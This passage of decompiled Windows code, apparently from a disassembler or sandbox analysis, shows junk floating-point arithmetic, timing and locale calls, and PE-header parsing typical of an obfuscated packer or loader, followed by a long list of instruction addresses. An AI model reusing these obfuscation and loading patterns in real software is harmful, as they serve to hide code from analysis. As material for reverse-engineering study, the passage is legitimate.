													_t573 = GetEnvironmentStringsW();
													E6E7D57C0();
													_t574 = E6E808500(_t573, 0);
													asm("cvtsd2ss xmm0, xmm0");
													asm("movss [ebp-0x60], xmm0");
													_t572 = E6E808500(_t574, 0xf6);
													asm("movss xmm1, [ebp-0x60]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("mulss xmm1, xmm0");
													asm("movd xmm0, esi");
													asm("cvtdq2ps xmm0, xmm0");
													asm("mulss xmm0, xmm1");
													asm("cvttss2si eax, xmm0");
												}
												goto L243;
											}
											L232:
											_t998 = _t998 - 1;
											__eflags = _v36 - _v52;
											_t569 = _v72;
											if(_v36 > _v52) {
												_t569 = _t569 +  *_t823;
												__eflags = _t569;
												_v72 = _t569;
											}
											_t824 = _t569 + 4;
											_t551 =  *_t824;
											_v28 = _t824;
											__eflags = _t551;
										} while (_t551 != 0);
									}
									goto L235;
								}
								L207:
								goto L207;
							}
							__eflags = _t910 - _v140;
							_t639 =  >  ? _t910 : _v112;
							_t923 =  >  ? _t910 : _v112;
							_v36 =  >  ? _t910 : _v112;
							__imp__GetTickCount64();
							E6E8084C0(E6E807870( >  ? _t910 : _v112,  >  ? _t910 : _v112, 0x2710, 0), _t640,  >  ? _t910 : _v112);
							asm("mulsd xmm0, [0x6e818560]");
							_t642 =  *_t946;
							_t946 = _t946 + 1;
							asm("movsd xmm1, [ebp-0x64]");
							_t910 = _v36;
							 *_t989 = _t642;
							_t989 = _t989 + 1;
							asm("mulsd xmm0, [0x6e818568]");
							_v8 = 0xffffffff;
							asm("addsd xmm1, xmm0");
							asm("movsd [ebp-0x64], xmm1");
							goto L145;
						}
						asm("cdq");
						_t644 = _t910 - _t910;
						__eflags = _t644;
						_t645 = _t644 >> 1;
						_v84 = _t645;
						while(1) {
							_v56 = _t796;
							__eflags = _t645 - _t988;
							if(_t645 >= _t988) {
								break;
							}
							_push(0);
							__eflags = _v40 - 0x5d;
							if(_v40 == 0x5d) {
								_push(0x14);
								_t647 = E6E7D5990(_t910);
								_t1033 = _t1033 + 8;
								_t910 = _t647 * _t647 + (_t647 * _t647 << 2) << 2;
								__eflags = _t910;
							} else {
								_push(0x2c);
								_t664 = E6E7D5990(_t910);
								_t665 = _t664;
								_t1033 = _t1033 + 8;
								_t217 = _t665 + 0x14; // 0x14
								asm("cdq");
								_t910 = _t664 / _t217;
							}
							_t857 = 0;
							_t650 = 0x33;
							__eflags = _t910 - 9;
							if(_t910 >= 9) {
								L133:
								__eflags = _t910 - 0x75;
								if(_t910 <= 0x75) {
									__imp__GetTickCount64();
									_t910 = 0x10;
								}
								_v41 = 0x4a;
								__eflags = _t910 - 0x6d;
								if(_t910 <= 0x6d) {
									L137:
									asm("movss xmm0, [0x6e8186d0]");
									_t651 = 0x6b;
									_v192 = 0;
									asm("movss [ebp-0x2c], xmm0");
									_t237 = _t651 - 0x35; // 0x36
									_t1016 = _t237;
									while(1) {
										_t652 = E6E7D5ED0(_t651, _t910);
										asm("movss xmm1, [ebp-0x2c]");
										_t1016 = _t1016 + _t652;
										asm("divss xmm1, xmm1");
										_v64 = _t652;
										asm("movd xmm0, esi");
										asm("cvtdq2ps xmm0, xmm0");
										asm("movss [ebp-0x2c], xmm1");
										asm("divss xmm1, xmm0");
										asm("movss [ebp-0x5c], xmm1");
										_t653 = E6E808500(_t652, _t652);
										asm("movss xmm1, [ebp-0x5c]");
										asm("cvtsd2ss xmm0, xmm0");
										asm("addss xmm1, xmm0");
										asm("cvttss2si eax, xmm1");
										_v40 = _t653;
										_v29 = _t653;
										__eflags = _t653 - 0x2e;
										if(_t653 < 0x2e) {
											break;
										}
										_t651 = _v64;
									}
									asm("movss xmm0, [0x6e8186a4]");
									_t860 = 0x4e;
									asm("movss [ebp-0x2c], xmm0");
									__eflags = _t653 - 0x3b;
									if(_t653 >= 0x3b) {
										L142:
										_t796 = _v28 + 1;
										__eflags = _v56 - _v112;
										_t645 = _v84;
										_t988 = _v52;
										_v28 = _t796;
										if(_v56 >= _v112) {
											continue;
										}
										_t910 = _v36;
										goto L144;
									} else {
										goto L141;
									}
									do {
										L141:
										asm("cdq");
										_t656 = E6E7D5990(_t910, _t860, _t910);
										asm("cvttss2si ecx, [ebp-0x2c]");
										_t1033 = _t1033 + 8;
										_v85 = _t656;
										E6E808500(E6E7D5ED0(_t860, _t910), _t657);
										_t860 = _v85;
										asm("xorps xmm1, xmm1");
										_t659 = _v85;
										asm("cvtsd2ss xmm1, xmm0");
										asm("movd xmm0, eax");
										asm("cvtdq2ps xmm0, xmm0");
										asm("movaps xmm2, xmm0");
										asm("addss xmm0, xmm1");
										asm("mulss xmm2, xmm1");
										asm("subss xmm0, xmm2");
										asm("movss [ebp-0x2c], xmm2");
										asm("cvttss2si eax, xmm0");
										_v40 = _t659;
										_v29 = _t659;
										__eflags = _t659 - 0x3b;
									} while (_t659 < 0x3b);
									goto L142;
								} else {
									do {
										GetACP();
										_t662 = _v41 + _v41;
										_v41 = _t662;
										__eflags = _t662 - 0x6d;
									} while (_t662 > 0x6d);
									goto L137;
								}
							} else {
								do {
									_t663 = E6E7D5990(_t910, _t650, _t857);
									_t650 = _t663;
									_t1033 = _t1033 + 8;
									asm("cdq");
									_t857 = _t910;
									_t910 = _t663;
									__eflags = _t910 - 9;
								} while (_t910 < 9);
								goto L133;
							}
						}
						_t646 = _v92;
						_t946 = _t646;
						_t989 = _v80;
						_t910 = _v36;
						_t854 =  *((intOrPtr*)(_t646 + 0x3c)) + _t646;
						_v116 = _t854;
						_t797 =  *(_t854 + 0x54);
						goto L146;
					}
					L279:
					_t984 = __imp__GetTickCount64;
					_t792 = _t791 - 1;
					_v92 = _t792;
					_v164 = _t792;
				}
			}

0x6e7d6430
0x6e7d6433
0x6e7d6435
0x6e7d6440
0x6e7d6441
0x6e7d6447
0x6e7d644c
0x6e7d644e
0x6e7d6452
0x6e7d6454
0x6e7d6455
0x6e7d6458
0x6e7d645e
0x6e7d6461
0x6e7d6465
0x6e7d646c
0x6e7d6470
0x6e7d6477
0x6e7d647b
0x6e7d6482
0x6e7d6485
0x6e7d648a
0x6e7d64ac
0x6e7d6493
0x6e7d6493
0x6e7d649f
0x6e7d64a2
0x6e7d64a7
0x6e7d64a7
0x6e7d64b3
0x6e7d64b8
0x6e7d64cc
0x6e7d64d9
0x6e7d64dc
0x6e7d64df
0x6e7d64e2
0x6e7d64e8
0x6e7d64eb
0x6e7d64ee
0x6e7d64f1
0x6e7d64f7
0x6e7d64fa
0x6e7d6501
0x6e7d6509
0x6e7d6511
0x6e7d6519
0x6e7d6521
0x6e7d6529
0x6e7d6531
0x6e7d6539
0x6e7d6541
0x6e7d6547
0x6e7d654d
0x6e7d6550
0x6e7d6558
0x6e7d6560
0x6e7d6562
0x6e7d6564
0x6e7d656a
0x6e7d656d
0x6e7d6573
0x6e7d6573
0x6e7d6579
0x6e7d6588
0x6e7d658b
0x6e7d6595
0x6e7d659a
0x6e7d65af
0x6e7d65bb
0x6e7d65c0
0x6e7d65cd
0x6e7d65d0
0x6e7d65d5
0x6e7d65d9
0x6e7d65e1
0x6e7d65e9
0x6e7d65ee
0x6e7d65f9
0x00000000
0x00000000
0x6e7d65ff
0x6e7d660a
0x00000000
0x00000000
0x6e7d6610
0x6e7d6612
0x6e7d661b
0x6e7d6621
0x6e7d6630
0x6e7d6630
0x6e7d6633
0x6e7d6636
0x6e7d663b
0x6e7d6641
0x6e7d6644
0x6e7d6647
0x6e7d664d
0x6e7d6650
0x6e7d6653
0x6e7d6653
0x6e7d6653
0x6e7d7f78
0x6e7d7f80
0x6e7d7f88
0x6e7d7f88
0x6e7d7f8e
0x6e7d7f9d
0x6e7d7fa5
0x6e7d7fa8
0x6e7d7fac
0x6e7d7fb0
0x6e7d7fb8
0x6e7d7fbc
0x6e7d7fc9
0x6e7d7fcb
0x6e7d7fd0
0x6e7d7fd3
0x6e7d7fdb
0x6e7d7fe3
0x6e7d7fe7
0x6e7d7feb
0x6e7d7fef
0x6e7d7ff3
0x6e7d7ff3
0x6e7d7ff7
0x6e7d8000
0x6e7d8000
0x6e7d8002
0x6e7d8004
0x6e7d8007
0x6e7d800a
0x6e7d800a
0x6e7d800f
0x6e7d6656
0x6e7d6656
0x6e7d6656
0x6e7d6659
0x6e7d665e
0x00000000
0x00000000
0x6e7d6664
0x6e7d6666
0x6e7d6f63
0x6e7d6f66
0x6e7d6f68
0x6e7d6f6d
0x6e7d6f70
0x6e7d6fca
0x6e7d6fca
0x6e7d6fcd
0x6e7d7053
0x6e7d7053
0x6e7d7055
0x6e7d7055
0x6e7d705b
0x6e7d705e
0x6e7d7066
0x6e7d7069
0x00000000
0x6e7d7069
0x6e7d6fd3
0x6e7d6fd9
0x6e7d6fe8
0x6e7d6fed
0x6e7d6ff5
0x6e7d6ff8
0x6e7d6ffd
0x6e7d6fff
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d7001
0x6e7d7001
0x6e7d7001
0x6e7d7007
0x6e7d700c
0x6e7d7010
0x6e7d7015
0x6e7d7025
0x6e7d702d
0x6e7d7032
0x6e7d7038
0x6e7d703c
0x6e7d7041
0x6e7d7046
0x6e7d704b
0x6e7d704f
0x6e7d704f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d6f72
0x6e7d6f72
0x6e7d6f74
0x6e7d6f7e
0x6e7d6f85
0x6e7d6f8a
0x6e7d6f8d
0x6e7d6f92
0x6e7d6f9a
0x6e7d6fa8
0x6e7d6faa
0x6e7d6faf
0x6e7d6fb2
0x6e7d6fb6
0x6e7d6fb9
0x6e7d6fbd
0x6e7d6fc1
0x6e7d6fc5
0x6e7d6fc5
0x00000000
0x6e7d6f72
0x6e7d666c
0x6e7d6672
0x6e7d667a
0x6e7d667d
0x6e7d667f
0x6e7d6682
0x6e7d6682
0x6e7d6685
0x6e7d6688
0x6e7d6691
0x6e7d6692
0x6e7d6697
0x6e7d669a
0x6e7d669c
0x6e7d66a2
0x6e7d6d2e
0x6e7d6d2e
0x6e7d6d31
0x6e7d6d31
0x6e7d6d38
0x6e7d6f56
0x6e7d6f59
0x6e7d6f5c
0x00000000
0x6e7d6f5c
0x6e7d6d3e
0x6e7d6d45
0x00000000
0x00000000
0x6e7d6d4b
0x6e7d6d4f
0x00000000
0x00000000
0x6e7d6d55
0x6e7d6d5b
0x6e7d6d63
0x6e7d6d66
0x6e7d6d72
0x6e7d6d75
0x6e7d6d78
0x6e7d6d8a
0x6e7d6d8a
0x6e7d6d90
0x6e7d6d92
0x6e7d6d94
0x6e7d6d9b
0x6e7d6d9e
0x00000000
0x6e7d6d9e
0x6e7d66ae
0x6e7d66b1
0x6e7d66b3
0x6e7d66b6
0x6e7d66b9
0x6e7d66ce
0x6e7d66d3
0x6e7d66d3
0x6e7d66d5
0x6e7d66d5
0x6e7d66df
0x6e7d66e4
0x6e7d66e7
0x6e7d66e9
0x6e7d66eb
0x6e7d66eb
0x6e7d66ef
0x6e7d66f3
0x6e7d66f3
0x6e7d66fd
0x6e7d6700
0x6e7d6705
0x6e7d6708
0x6e7d670b
0x6e7d670b
0x6e7d670f
0x6e7d6713
0x6e7d6713
0x6e7d671f
0x6e7d6727
0x6e7d6729
0x6e7d672c
0x6e7d672f
0x6e7d6732
0x6e7d6732
0x6e7d6737
0x6e7d673a
0x00000000
0x6e7d673a
0x6e7d66c2
0x6e7d66c7
0x6e7d66ca
0x6e7d673d
0x6e7d673d
0x6e7d6741
0x6e7d6744
0x6e7d6746
0x6e7d6746
0x6e7d674c
0x6e7d674e
0x6e7d6751
0x6e7d6752
0x6e7d6758
0x6e7d675b
0x6e7d675e
0x6e7d6761
0x6e7d6764
0x6e7d6773
0x00000000
0x00000000
0x6e7d6779
0x6e7d6780
0x6e7d6791
0x6e7d679d
0x6e7d67a0
0x6e7d67a6
0x6e7d67ab
0x6e7d67ae
0x6e7d67ae
0x6e7d67ae
0x6e7d6793
0x6e7d6793
0x6e7d6799
0x6e7d6799
0x6e7d67b1
0x6e7d67b9
0x6e7d67c1
0x6e7d67f6
0x6e7d67f9
0x6e7d67fb
0x6e7d6805
0x6e7d680a
0x6e7d680a
0x6e7d680d
0x6e7d6812
0x6e7d6812
0x6e7d6815
0x6e7d681a
0x6e7d681d
0x6e7d6820
0x6e7d6822
0x6e7d6825
0x6e7d6828
0x00000000
0x6e7d67c3
0x6e7d67c3
0x6e7d67c3
0x6e7d67c9
0x6e7d67ce
0x6e7d67d3
0x6e7d67d8
0x6e7d67dc
0x6e7d67e0
0x6e7d67e4
0x6e7d67e8
0x6e7d67ed
0x6e7d67f1
0x00000000
0x6e7d67c3
0x6e7d67c1
0x6e7d6835
0x6e7d6838
0x6e7d683b
0x6e7d6848
0x6e7d684a
0x6e7d6857
0x6e7d685a
0x6e7d685d
0x6e7d6860
0x6e7d6865
0x6e7d686d
0x6e7d686d
0x6e7d6870
0x6e7d6873
0x00000000
0x00000000
0x6e7d6879
0x6e7d6880
0x6e7d6883
0x6e7d6885
0x00000000
0x00000000
0x6e7d6887
0x6e7d688a
0x6e7d688c
0x6e7d688e
0x6e7d6891
0x6e7d6894
0x6e7d6894
0x6e7d689c
0x6e7d689f
0x6e7d68a2
0x6e7d68a2
0x6e7d68ad
0x6e7d68b2
0x6e7d68b4
0x6e7d68b4
0x6e7d68b6
0x6e7d68c0
0x6e7d68c0
0x6e7d68c3
0x6e7d68c9
0x6e7d68cb
0x6e7d68cd
0x6e7d68cd
0x6e7d68d1
0x6e7d68d7
0x6e7d68ed
0x6e7d68f6
0x6e7d68ff
0x6e7d6902
0x6e7d6905
0x6e7d6911
0x6e7d6918
0x6e7d691b
0x6e7d6921
0x6e7d694d
0x6e7d6953
0x6e7d697e
0x6e7d6984
0x6e7d6af3
0x6e7d6af6
0x6e7d6afb
0x6e7d6b03
0x6e7d6b03
0x6e7d6b06
0x6e7d6b08
0x6e7d6b0b
0x6e7d6b0e
0x6e7d686a
0x6e7d686a
0x00000000
0x6e7d686a
0x6e7d6b14
0x6e7d6b17
0x6e7d6b1a
0x6e7d6b20
0x6e7d6b20
0x6e7d6b22
0x6e7d6b25
0x00000000
0x00000000
0x6e7d6b27
0x6e7d6b2a
0x6e7d6d20
0x6e7d6d26
0x6e7d6d26
0x00000000
0x6e7d6d26
0x6e7d6b35
0x6e7d6b41
0x6e7d6b44
0x6e7d6b47
0x6e7d6b4a
0x6e7d6b4d
0x00000000
0x00000000
0x6e7d6b53
0x6e7d6b56
0x6e7d6b57
0x6e7d6b5a
0x6e7d6b5d
0x00000000
0x00000000
0x6e7d6b63
0x6e7d6b63
0x6e7d6b68
0x6e7d6b6c
0x6e7d6b70
0x6e7d6b73
0x00000000
0x6e7d6b73
0x6e7d698a
0x6e7d698d
0x6e7d6990
0x6e7d69aa
0x6e7d69ad
0x6e7d6d18
0x6e7d6d18
0x00000000
0x6e7d6d18
0x6e7d69b3
0x6e7d69bb
0x6e7d69be
0x6e7d69d2
0x6e7d69d2
0x6e7d69da
0x6e7d69df
0x6e7d69e7
0x6e7d69f0
0x6e7d69f0
0x6e7d69f6
0x6e7d69fb
0x6e7d6a03
0x6e7d6a06
0x6e7d6a0a
0x6e7d6a0e
0x6e7d6a1a
0x6e7d6a1f
0x6e7d6a24
0x6e7d6a27
0x6e7d6a2a
0x6e7d6a2d
0x6e7d6a31
0x6e7d6a35
0x6e7d6a39
0x6e7d6a41
0x6e7d6a45
0x6e7d6a48
0x6e7d6a4b
0x6e7d6a4b
0x6e7d6a4f
0x6e7d6a57
0x6e7d6a5c
0x6e7d6a61
0x6e7d6a68
0x6e7d6a6a
0x6e7d6ade
0x6e7d6ade
0x6e7d6ae0
0x6e7d6ae2
0x6e7d6aed
0x6e7d6af0
0x6e7d6af0
0x00000000
0x6e7d6ae0
0x6e7d6a6c
0x6e7d6a70
0x6e7d6a75
0x6e7d6a78
0x6e7d6a80
0x6e7d6a80
0x6e7d6a85
0x6e7d6a8a
0x6e7d6a8e
0x6e7d6a95
0x6e7d6a9c
0x6e7d6a9d
0x6e7d6aa2
0x6e7d6aa6
0x6e7d6aaf
0x6e7d6ab4
0x6e7d6ab9
0x6e7d6abc
0x6e7d6ac0
0x6e7d6ac4
0x6e7d6ac7
0x6e7d6acc
0x6e7d6ad0
0x6e7d6ad4
0x6e7d6ad7
0x6e7d6ada
0x6e7d6ada
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d69c0
0x6e7d69c0
0x6e7d69c0
0x6e7d69c3
0x6e7d69c7
0x6e7d69cb
0x6e7d69ce
0x6e7d69ce
0x00000000
0x6e7d69c0
0x6e7d6997
0x6e7d699d
0x6e7d69a2
0x00000000
0x6e7d69a2
0x6e7d6958
0x6e7d695a
0x6e7d695d
0x6e7d6c30
0x6e7d6c30
0x6e7d6c33
0x6e7d6c78
0x6e7d6c78
0x6e7d6c7b
0x6e7d6c7d
0x6e7d6c7d
0x6e7d6c83
0x6e7d6c8c
0x6e7d6c90
0x6e7d6c90
0x6e7d6c95
0x6e7d6c9c
0x6e7d6c9f
0x6e7d6ca7
0x6e7d6caa
0x6e7d6cb3
0x6e7d6cb5
0x6e7d6cb8
0x6e7d6cc2
0x6e7d6cc7
0x6e7d6cc9
0x6e7d6cc9
0x00000000
0x6e7d6c90
0x6e7d6c3a
0x6e7d6c40
0x6e7d6c42
0x6e7d6c4c
0x6e7d6c54
0x6e7d6c5c
0x6e7d6c5e
0x6e7d6c63
0x6e7d6c66
0x6e7d6c69
0x6e7d6c6b
0x6e7d6c6d
0x6e7d6c6d
0x00000000
0x6e7d6cce
0x6e7d6cce
0x6e7d6cd1
0x6e7d6cd3
0x6e7d6cd9
0x6e7d6ced
0x6e7d6cf0
0x6e7d6cf3
0x6e7d6cf7
0x6e7d6cfa
0x6e7d6d02
0x6e7d6d02
0x6e7d6d06
0x6e7d6d06
0x6e7d6d10
0x6e7d6d10
0x00000000
0x6e7d6d10
0x6e7d6968
0x6e7d6971
0x6e7d6976
0x00000000
0x6e7d6976
0x6e7d6929
0x6e7d692c
0x6e7d6b81
0x6e7d6b81
0x6e7d6b84
0x00000000
0x00000000
0x6e7d6b86
0x6e7d6b86
0x6e7d6b93
0x6e7d6b9a
0x6e7d6ba0
0x6e7d6ba3
0x6e7d6ba8
0x6e7d6bae
0x6e7d6baf
0x6e7d6bb8
0x6e7d6bc4
0x6e7d6bc4
0x6e7d6bc7
0x6e7d6bc7
0x6e7d6bca
0x6e7d6be5
0x6e7d6be8
0x6e7d6bed
0x6e7d6bf0
0x6e7d6bf8
0x6e7d6bfb
0x6e7d6bfd
0x6e7d6c02
0x6e7d6c05
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d6c07
0x6e7d6c07
0x6e7d6c07
0x6e7d6c09
0x6e7d6c0e
0x6e7d6c12
0x6e7d6c16
0x6e7d6c1b
0x6e7d6c1b
0x6e7d6b81
0x6e7d6b81
0x6e7d6b84
0x00000000
0x00000000
0x00000000
0x6e7d6b84
0x6e7d6b81
0x6e7d6bcc
0x6e7d6bd2
0x00000000
0x6e7d6b8e
0x6e7d6b8e
0x6e7d6b91
0x00000000
0x00000000
0x00000000
0x6e7d6b91
0x6e7d6b81
0x6e7d6937
0x6e7d6940
0x6e7d6945
0x00000000
0x6e7d6945
0x6e7d68d9
0x6e7d68df
0x00000000
0x00000000
0x6e7d68e1
0x6e7d68e7
0x6e7d6b00
0x00000000
0x6e7d6b00
0x00000000
0x6e7d68e7
0x00000000
0x6e7d686d
0x6e7d6da4
0x6e7d6dac
0x6e7d6db1
0x6e7d6db9
0x6e7d6dc0
0x6e7d6dc0
0x6e7d6dc6
0x6e7d6dcb
0x6e7d6ddc
0x6e7d6de4
0x6e7d6de9
0x6e7d6df5
0x6e7d6dfa
0x6e7d6dff
0x6e7d6dff
0x6e7d6e00
0x6e7d6e04
0x6e7d6e08
0x6e7d6e0c
0x6e7d6e14
0x6e7d6e19
0x6e7d6e1e
0x6e7d6e23
0x6e7d6e2b
0x6e7d6e2b
0x6e7d6e31
0x6e7d6e34
0x6e7d6e36
0x6e7d6e39
0x6e7d6e3c
0x6e7d6e3e
0x6e7d71c8
0x6e7d71c8
0x6e7d71cb
0x6e7d71ce
0x6e7d71ce
0x6e7d71d1
0x6e7d71d4
0x6e7d71d7
0x6e7d71d9
0x6e7d724f
0x6e7d7257
0x6e7d725c
0x6e7d7262
0x6e7d726a
0x6e7d7272
0x6e7d727a
0x6e7d7280
0x6e7d7280
0x6e7d7282
0x6e7d7287
0x6e7d7298
0x6e7d729d
0x6e7d72a9
0x6e7d72ae
0x6e7d72b3
0x6e7d72b3
0x6e7d72b4
0x6e7d72b8
0x6e7d72bc
0x6e7d72c0
0x6e7d72c8
0x6e7d72cd
0x6e7d72d2
0x6e7d72d7
0x6e7d72df
0x6e7d72df
0x6e7d72e8
0x6e7d72eb
0x6e7d7f1e
0x6e7d7f26
0x6e7d7f29
0x6e7d7f31
0x6e7d7f34
0x6e7d7f70
0x6e7d7f70
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d7f36
0x6e7d7f36
0x6e7d7f36
0x6e7d7f3f
0x6e7d7f41
0x6e7d7f46
0x6e7d7f4a
0x6e7d7f4d
0x6e7d7f51
0x6e7d7f54
0x6e7d7f5c
0x6e7d7f60
0x6e7d7f68
0x6e7d7f6c
0x6e7d7f6c
0x00000000
0x6e7d7f36
0x6e7d72f1
0x6e7d72f7
0x6e7d730d
0x6e7d7312
0x6e7d7323
0x6e7d732f
0x6e7d7334
0x6e7d7339
0x6e7d733c
0x6e7d7341
0x6e7d7349
0x6e7d7350
0x6e7d7352
0x6e7d7355
0x6e7d735d
0x6e7d7365
0x6e7d736a
0x6e7d736a
0x6e7d736d
0x6e7d736f
0x6e7d7370
0x6e7d7373
0x6e7d7376
0x6e7d7378
0x00000000
0x00000000
0x6e7d737a
0x6e7d737d
0x6e7d7389
0x6e7d738c
0x6e7d738f
0x6e7d7391
0x6e7d7394
0x6e7d739a
0x6e7d739d
0x6e7d73a0
0x6e7d73a2
0x6e7d73be
0x6e7d73be
0x6e7d73bf
0x6e7d73c6
0x6e7d73c9
0x00000000
0x6e7d73c9
0x6e7d73a4
0x6e7d73a6
0x6e7d73a6
0x6e7d73a8
0x6e7d73ab
0x6e7d73ad
0x6e7d73b0
0x6e7d73b0
0x6e7d73b0
0x6e7d73b5
0x6e7d73b8
0x6e7d73bb
0x00000000
0x6e7d73bb
0x6e7d73ce
0x6e7d73d6
0x6e7d73db
0x6e7d73e0
0x6e7d73e0
0x6e7d73e6
0x6e7d73eb
0x6e7d73fc
0x6e7d7404
0x6e7d7409
0x6e7d7415
0x6e7d741a
0x6e7d741f
0x6e7d741f
0x6e7d7420
0x6e7d7428
0x6e7d7430
0x6e7d7435
0x6e7d743a
0x6e7d7442
0x6e7d7446
0x6e7d744a
0x6e7d744e
0x6e7d744e
0x6e7d745b
0x6e7d7460
0x6e7d7463
0x6e7d7466
0x6e7d7468
0x6e7d746b
0x00000000
0x00000000
0x6e7d7d82
0x6e7d7d85
0x6e7d7d87
0x6e7d7d92
0x6e7d7d9b
0x6e7d7da0
0x6e7d7da2
0x6e7d7da4
0x6e7d7da5
0x6e7d7da5
0x6e7d7da7
0x6e7d7da7
0x6e7d7da9
0x6e7d7db1
0x6e7d7db9
0x6e7d7dbc
0x6e7d7e2f
0x6e7d7e2f
0x6e7d7e32
0x6e7d7e47
0x6e7d7e34
0x6e7d7e38
0x6e7d7e3d
0x6e7d7e3d
0x6e7d7e4c
0x6e7d7e54
0x6e7d7e60
0x6e7d7e60
0x6e7d7e62
0x6e7d7e67
0x6e7d7e6b
0x6e7d7e6f
0x6e7d7e74
0x6e7d7e74
0x6e7d7e78
0x6e7d7e7a
0x6e7d7e81
0x6e7d7e81
0x6e7d7e86
0x6e7d7e8e
0x6e7d7e90
0x6e7d7e95
0x6e7d7e95
0x6e7d7e98
0x6e7d7e9d
0x6e7d7ea1
0x6e7d7ea6
0x6e7d7ea6
0x6e7d7eac
0x6e7d7eb8
0x6e7d7ebd
0x6e7d7ec0
0x6e7d7ec4
0x6e7d7ec9
0x6e7d7ece
0x6e7d7ed3
0x6e7d7ed8
0x6e7d7edb
0x6e7d7ee5
0x6e7d7ee7
0x6e7d7eec
0x6e7d7eef
0x6e7d7ef3
0x6e7d7ef8
0x6e7d7efc
0x6e7d7f01
0x6e7d7f06
0x6e7d7f0a
0x6e7d7f0e
0x6e7d7f11
0x6e7d7f14
0x6e7d7f14
0x00000000
0x6e7d7dbe
0x6e7d7dbe
0x6e7d7dc6
0x6e7d7dcb
0x6e7d7dd3
0x6e7d7dd3
0x6e7d7dd9
0x6e7d7de1
0x6e7d7de4
0x6e7d7dec
0x6e7d7df0
0x6e7d7df5
0x6e7d7df8
0x6e7d7dfc
0x6e7d7e00
0x6e7d7e03
0x6e7d7e06
0x6e7d7e0a
0x6e7d7e12
0x6e7d7e16
0x6e7d7e1a
0x6e7d7e22
0x6e7d7e26
0x6e7d7e2a
0x6e7d7e2a
0x00000000
0x6e7d7dd3
0x6e7d7dbc
0x6e7d7474
0x6e7d7477
0x6e7d747a
0x6e7d747d
0x6e7d7482
0x6e7d7484
0x6e7d7487
0x6e7d748a
0x6e7d7490
0x6e7d7490
0x6e7d7493
0x6e7d7495
0x00000000
0x00000000
0x6e7d749b
0x6e7d749e
0x00000000
0x00000000
0x6e7d74ac
0x6e7d74b2
0x6e7d74b9
0x6e7d74bd
0x6e7d74bf
0x6e7d74c2
0x6e7d74d1
0x6e7d74d6
0x6e7d74d9
0x6e7d74dc
0x6e7d74df
0x6e7d74e2
0x6e7d74e8
0x6e7d74eb
0x6e7d74ee
0x6e7d7632
0x6e7d7635
0x6e7d7638
0x6e7d763b
0x6e7d763e
0x6e7d77f9
0x6e7d77f9
0x6e7d77fc
0x6e7d77ff
0x6e7d7979
0x6e7d7981
0x6e7d7981
0x6e7d7990
0x6e7d7993
0x6e7d7996
0x6e7d799a
0x6e7d799d
0x6e7d79a0
0x6e7d79a8
0x6e7d79ac
0x6e7d79af
0x6e7d79b2
0x6e7d79b2
0x6e7d79b6
0x6e7d79b9
0x6e7d79bc
0x00000000
0x6e7d79bc
0x6e7d7808
0x6e7d780b
0x6e7d780e
0x6e7d7811
0x6e7d7814
0x00000000
0x6e7d7644
0x6e7d7644
0x6e7d7644
0x6e7d7646
0x6e7d7846
0x6e7d7846
0x6e7d7849
0x6e7d784b
0x6e7d784e
0x6e7d7873
0x6e7d7876
0x6e7d787c
0x6e7d7882
0x6e7d7891
0x6e7d7899
0x6e7d789c
0x6e7d78a0
0x6e7d78a4
0x6e7d78af
0x6e7d78b4
0x6e7d78bd
0x6e7d78c1
0x6e7d78c9
0x6e7d78ce
0x6e7d78d2
0x6e7d78df
0x6e7d78e1
0x6e7d78e6
0x6e7d78ea
0x6e7d78ed
0x6e7d78f1
0x6e7d78f5
0x6e7d78fd
0x6e7d7901
0x6e7d7901
0x6e7d7905
0x6e7d790d
0x6e7d7910
0x6e7d792b
0x6e7d792b
0x6e7d792e
0x6e7d7930
0x6e7d7930
0x6e7d7936
0x6e7d7945
0x6e7d794d
0x6e7d7950
0x6e7d7953
0x6e7d7957
0x6e7d795b
0x6e7d795e
0x6e7d7966
0x6e7d796a
0x6e7d796e
0x6e7d7971
0x00000000
0x6e7d7912
0x6e7d7912
0x6e7d7912
0x6e7d7916
0x6e7d791b
0x6e7d791d
0x6e7d7922
0x6e7d7926
0x6e7d7926
0x00000000
0x6e7d7912
0x6e7d7910
0x6e7d7852
0x6e7d7855
0x6e7d7858
0x6e7d7860
0x6e7d7866
0x6e7d7869
0x6e7d786c
0x00000000
0x6e7d786c
0x6e7d764c
0x6e7d764f
0x00000000
0x00000000
0x6e7d7655
0x6e7d7658
0x6e7d765a
0x6e7d765d
0x6e7d7660
0x6e7d77d1
0x6e7d77d1
0x00000000
0x6e7d77d1
0x6e7d7666
0x6e7d7667
0x6e7d7667
0x6e7d7669
0x6e7d766b
0x6e7d7670
0x6e7d7670
0x6e7d7672
0x6e7d7675
0x6e7d7678
0x00000000
0x00000000
0x6e7d767e
0x6e7d7686
0x6e7d768b
0x6e7d768e
0x6e7d76e3
0x6e7d76e3
0x6e7d76e5
0x6e7d76e8
0x6e7d76fe
0x6e7d76fe
0x6e7d7707
0x6e7d770c
0x6e7d770f
0x6e7d7789
0x6e7d7789
0x6e7d778c
0x6e7d778f
0x6e7d77b8
0x6e7d77bb
0x6e7d77be
0x6e7d77bf
0x6e7d77c2
0x6e7d77c5
0x00000000
0x00000000
0x6e7d77cb
0x6e7d77ce
0x00000000
0x6e7d77ce
0x6e7d7791
0x6e7d7794
0x6e7d7794
0x6e7d7797
0x6e7d779a
0x6e7d779e
0x6e7d77a2
0x6e7d77a5
0x6e7d77a9
0x6e7d77ad
0x6e7d77b0
0x6e7d77b3
0x6e7d77b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d7711
0x6e7d7711
0x6e7d7719
0x6e7d7724
0x6e7d7729
0x6e7d772f
0x6e7d7733
0x6e7d7737
0x6e7d773a
0x6e7d773f
0x6e7d7743
0x6e7d7747
0x6e7d774c
0x6e7d774e
0x6e7d7752
0x6e7d7758
0x6e7d7760
0x6e7d7762
0x6e7d7767
0x6e7d776f
0x6e7d7773
0x6e7d7777
0x6e7d777b
0x6e7d777e
0x6e7d7781
0x6e7d7781
0x6e7d7786
0x00000000
0x6e7d7786
0x6e7d76ea
0x6e7d76f0
0x6e7d76f0
0x6e7d76f2
0x6e7d76f4
0x6e7d76f7
0x6e7d76fa
0x6e7d76fa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d7690
0x6e7d7690
0x6e7d7690
0x6e7d7696
0x6e7d76a2
0x6e7d76aa
0x6e7d76ad
0x6e7d76b1
